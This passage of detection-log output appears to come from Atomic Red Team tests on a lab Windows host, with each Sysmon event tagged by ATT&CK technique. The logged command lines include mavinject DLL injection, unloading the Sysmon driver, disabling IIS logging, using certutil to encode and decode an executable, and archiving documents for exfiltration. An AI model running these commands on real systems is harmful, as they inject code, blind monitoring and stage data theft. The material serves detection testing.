High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1179] Hooking detected,1563548236.496455,2019-07-19T18:57:16.496455+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\mavinject.exe ) through command line ( "C:\Windows\system32\mavinject.exe" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4078 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:15.754 + 747F3D96-DA4B-5D31-0000-0010CB413D00 + 2604 + C:\Windows\System32\mavinject.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft Application Virtualization Injector + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\mavinject.exe" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548235.776993,2019-07-19T18:57:15.776993+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4077 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:14.972 + 747F3D96-DA4A-5D31-0000-00107A2C3D00 + 2584 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548234.991615,2019-07-19T18:57:14.991615+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\inetsrv\appcmd.exe set config " "Default /section:httplogging /dontLog:true" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4076 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:14.928 + 747F3D96-DA4A-5D31-0000-00106C293D00 + 4056 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\inetsrv\appcmd.exe set config " "Default /section:httplogging /dontLog:true" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548234.944276,2019-07-19T18:57:14.944276+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4075 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:14.745 + 747F3D96-DA4A-5D31-0000-0010EE223D00 + 1012 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548234.758535,2019-07-19T18:57:14.758535+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "fltmc.exe unload SysmonDrv" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4074 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:14.696 + 747F3D96-DA4A-5D31-0000-0010C21F3D00 + 3976 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "fltmc.exe unload SysmonDrv" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548234.715974,2019-07-19T18:57:14.715974+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4073 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.529 + 747F3D96-DA40-5D31-0000-0010E16B3C00 + 264 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.41285,2019-07-19T18:57:04.412850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4069 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.346 + 747F3D96-DA40-5D31-0000-0010565D3C00 + 3932 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DA40-5D31-0000-0010CF5A3C00 + 4336 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.361122,2019-07-19T18:57:04.361122+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4068 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.316 + 747F3D96-DA40-5D31-0000-0010CF5A3C00 + 4336 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.333864,2019-07-19T18:57:04.333864+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4067 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.256 + 747F3D96-DA40-5D31-0000-0010B1553C00 + 5168 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DA40-5D31-0000-00106A543C00 + 6572 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.294575,2019-07-19T18:57:04.294575+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4066 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:04.236 + 747F3D96-DA40-5D31-0000-00106A543C00 + 6572 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.270645,2019-07-19T18:57:04.270645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4065 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.938 + 747F3D96-DA3F-5D31-0000-0010813E3C00 + 7140 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -decode file.txt c:\file.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4064 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.818 + 747F3D96-DA3F-5D31-0000-001022323C00 + 6888 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -decode file.txt c:\file.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-0010562E3C00 + 4020 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1140] Deobfuscate/Decode Files or Information,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ) tried decoding file or information,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4064 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.818 + 747F3D96-DA3F-5D31-0000-001022323C00 + 6888 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -decode file.txt c:\file.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-0010562E3C00 + 4020 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4064 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.818 + 747F3D96-DA3F-5D31-0000-001022323C00 + 6888 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -decode file.txt c:\file.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-0010562E3C00 + 4020 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548223.974754,2019-07-19T18:57:03.974754+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4063 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.786 + 747F3D96-DA3F-5D31-0000-0010562E3C00 + 4020 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -encode c:\file.exe file.txt)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4062 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.261 + 747F3D96-DA3F-5D31-0000-00109E193C00 + 1260 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -encode c:\file.exe file.txt + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-00104C173C00 + 4832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -encode c:\file.exe file.txt ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4062 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.261 + 747F3D96-DA3F-5D31-0000-00109E193C00 + 1260 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -encode c:\file.exe file.txt + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-00104C173C00 + 4832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548223.309488,2019-07-19T18:57:03.309488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4061 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.223 + 747F3D96-DA3F-5D31-0000-00104C173C00 + 4832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548097.044623,2019-07-19T18:54:57.044623+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4054 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:54:16.818 + 747F3D96-D998-5D31-0000-00101BB73900 + 2424 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548056.830063,2019-07-19T18:54:16.830063+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "rar a -r exfilthis.rar *.docx" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4053 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:54:16.766 + 747F3D96-D998-5D31-0000-001008B43900 + 2000 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "rar a -r exfilthis.rar *.docx" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548056.782667,2019-07-19T18:54:16.782667+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4052 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:54:01.940 + 747F3D96-D989-5D31-0000-0010FC7B3900 + 4944 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 